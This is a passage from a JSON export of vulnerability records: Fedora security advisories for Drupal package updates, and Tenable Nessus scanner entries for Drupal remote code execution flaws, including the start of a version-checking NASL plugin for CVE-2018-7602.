"modified": "2013-01-05T06:35:46", "id": "FEDORA:5DED920B93", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/E75FC5W2UXCHOCU27MZQ7573GSM3DXFE/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {}, "published": "2013-01-05T06:36:30", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: drupal7-7.18-1.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5652", "CVE-2012-5653"], "modified": "2013-01-05T06:36:30", "id": "FEDORA:0C91720BC3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/D7M25LEJTNJOXJGIF6XTPJ7MN4IYMX2G/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:16:35", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:16:35", "id": "FEDORA:9FC6E6070D50", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-09T21:27:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-09T21:27:49", "id": "FEDORA:5C39A60311F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:13:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-10T19:13:53", "id": "FEDORA:17401605E206", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:06", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-12-03T01:39:06", "id": "FEDORA:4B26D6048172", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-07T20:06:44", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2019-03-07T20:06:44", "id": "FEDORA:7595560DCBCA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:11:07", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal7-7.59-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:11:07", "id": "FEDORA:45D79604B015", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T01:37:00", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.13-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-6341"], "modified": "2019-04-02T01:37:00", "id": "FEDORA:2C56E6076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-08T01:19:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.15-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-10909", "CVE-2019-10910", "CVE-2019-10911", "CVE-2019-11358"], "modified": "2019-05-08T01:19:07", "id": "FEDORA:3F234602D69C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:51:30", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.5.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98573", "href": "https://www.tenable.com/plugins/was/98573", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:41", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.3.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98575", "href": "https://www.tenable.com/plugins/was/98575", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:53", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.2.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98576", "href": "https://www.tenable.com/plugins/was/98576", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:34", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.0.x < 8.5.3 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98578", "href": "https://www.tenable.com/plugins/was/98578", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:40", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.8 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98574", "href": "https://www.tenable.com/plugins/was/98574", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:23", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal7 (2018-43c64deada) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-43C64DEADA.NASL", "href": "https://www.tenable.com/plugins/nessus/120383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-43c64deada.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-43c64deada\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 28 : drupal7 (2018-43c64deada) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43c64deada\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 